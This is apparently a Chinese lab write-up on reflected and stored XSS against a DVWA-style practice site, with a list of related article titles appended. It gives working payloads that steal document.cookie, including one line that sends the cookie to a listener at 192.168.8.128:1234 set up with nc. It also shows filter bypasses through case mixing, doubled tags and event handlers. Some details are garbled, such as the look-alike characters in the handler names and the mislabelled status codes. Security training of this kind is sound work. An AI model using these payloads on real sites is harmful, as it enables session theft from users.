Xss-reflected/stored跨站脚本分析(Cross site scripting)

基础知识

针对Dom - dochtml

Url概念:协议+网址/dns+端口+路径

XSS原理:对URL中的参数和对用户输入提交给web server的内容,没有进行充分的过滤。如果我们能够在web程序中对用户提交的URL中的参数,和提交的所有内容进行充分的过滤,将所有的不合法的参数和输入内容过滤掉,那么就不会导致“在用户的浏览器中执行攻击者自己定制的脚本”。

?name=<script>alert(document.cookie)</script>#

Php 会话id

Kali监听

Nc -nvlp  测试网络连通性

  1. ip地址、不用域名 v-详细输出 l-监听模式 p-端口号

192.168.184.195

新建标签

<script>var img=document.createElement("img");img.src="http://192.168.8.128:1234/?a="+escape(document.cookie);</script>#

Post 上传参数

Get获取参数

状态数值:

100

200 ok

400 服务器客户端问题

500 服务器客户端问题

实训过程

Reflected型

初级:直接写脚本语言

?name=<script>alert(document.cookie)</script>#

中级:大小写绕过、双写绕过

此处将<script>替换成了空格,所以可以大小写绕过或双写绕过

<scRipt>alert("666")</sCript>

<sc<script>ript>alert("666")</sc<script>ript>

高级:标签绕过

由源码可知,通配符过滤了/ script 而且无关大小写

<img src=1 οnerrοr=alert(document.cookie)>

<body οnlοad=alert(document.cookie)>

原理

stored型

看源代码,Name和message相比,防护性较低

其中:

stripslashes() 删除字符串中的反斜杠 /

mysqli_real_escape_string() 对特殊字符进行转意 \n \r \t

所以无法直接在前端上传脚本,用bp抓包,修改数据后,再发给服务器即可

初级:bp抓包,改数据,写脚本

中级:大小写绕过、双写绕过

<scRipt>alert("666")</sCript>

<sc<script>ript>alert("666")</sc<script>ript>

高级:标签绕过

<img src=1 οnerrοr=alert(document.cookie)>

<body οnlοad=alert(document.cookie)>

结果验证:均可弹出cookie窗口

Xss-reflected/stored跨站脚本分析(Cross site scripting)相关推荐

  1. 跨站脚本攻击(Cross‐Site Scripting (XSS))实践

    作者发现博客园在首页显示摘要时未做html标签的过滤,致使摘要中的html代码可以被执行,从而可以注入任何想要被执行的js代码,作者利用这一缺陷在本文摘要中插入了一段js代码执行alert弹窗,同时增 ...

  2. Reflected Cross Site Scripting (XSS)

    前言 反射型XSS, 即 Reflected Cross Site Scripting (XSS),  攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的 页 ...

  3. DVWA V1.9:Reflected Cross Site Scripting(存储型XSS)

    DVWA V1.9:Reflected Cross Site Scripting(存储型XSS) 存储型 XSS 介绍 Low 级别 核心代码 官方提示 漏洞利用 Medium 级别 核心代码 官方提 ...

  4. XSS(Cross Site Scripting)攻击简介

    环境 Ubuntu 22.04 IntelliJ IDEA 2022.1.3 JDK 17.0.3.1 Spring Boot 3.0.1 Firefox 108.0.2 问题和分析 在Intelli ...

  5. 【常见Web应用安全问题】---1、Cross Site Scripting

    Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些.  常见Web应用安全问题安全性问题的列表: 1.跨站脚本攻击(CSS or XSS, Cross Si ...

  6. XSSF - Cross Site Scripting Framework

    2019独角兽企业重金招聘Python工程师标准>>> 跨站脚本框架 (XSSF) 是一个设计用来快速发现网站存在XSS漏洞的一个安全工具集. 该项目是为了验证网站存在的XSS漏洞及 ...

  7. Cross Site Scripting DOM攻击jQuery append() 的处理方法

    做安全红线使用Fortify工具进行扫描时,jquery append会报Cross Site Scripting DOM风险.解决该问题有两种办法. 一.原生dom方式 使用JavaScript原生 ...

  8. CHECKMARX安全漏洞检测防止XSS(Cross Site Scripting)跨站脚本攻击

    CHECKMARX安全漏洞检测防止XSS跨站脚本攻击 总结CHECKMARX软件安全检测报告高危风险漏洞处理方式 高危警告内容 This can enable a Reflected Cross-Si ...

  9. DVWA关卡11:Reflected Cross Site Scripting (XSS)(反射型XSS)

    目录 Low Medium High Impossible 反射型XSS:恶意脚本未经转义被直接输入并作为HTML输出的一部分,恶意脚本不在后台存储,直接在前端浏览器被执行. 攻击者可以使用XSS向恶 ...

最新文章

  1. 如何通过 Serverless 轻松识别验证码?
  2. 转:国外科技论文写作资源
  3. maven provided
  4. phpMyAdmin导入大的sql文件
  5. QT高级编程之QT基本概览
  6. org.apache.poi.POIXMLException: java.lang.reflect.InvocationTargetException
  7. 【C++实现python字符串函数库】strip、lstrip、rstrip方法
  8. 面向对象程序设计的思想的长处
  9. MFC 简单输出EXCEL - (OLE)
  10. 手机WIFI的上行下行速度不同
  11. otdr进行多种测试鸿蒙包括,OTDR 测试
  12. C语言程序输入一个三位数取个位十位百位
  13. 在线html解压,javascript实现网页端解压并查看zip文件
  14. ap mt7260a 华硕_带你入坑,用MT7620A带USB口的路由器搭建一个私有网盘
  15. ALOHA协议和CSMA协议
  16. 操作系统进程进行系统调用详细过程
  17. Softing pnGate系列网关:将PROFIBUS总线集成到PROFINET网络
  18. 胡爱玲医生论中医治疗荨麻疹的优势和理念
  19. 关于Linux下C语言编程execvp函数的一个问题
  20. C语言结构体(struct)的几种定义方式

热门文章

  1. c mysql 报表_c 数据库报表打印
  2. 推荐17款最好用的跨浏览器测试工具
  3. VINS_FUSION
  4. 聊聊redis分布式锁的8大坑
  5. ubuntu 下载jdk1.8
  6. 巧妇能为少米之炊(1)——Android下小内存下的生存之道
  7. 百度云服务器连接SQLServer2012
  8. 【转】拜占庭政治经济体
  9. Spring MVC框架在进行表单提交,自动封装成对象提交,在以对象的形式入参
  10. VLC Media Player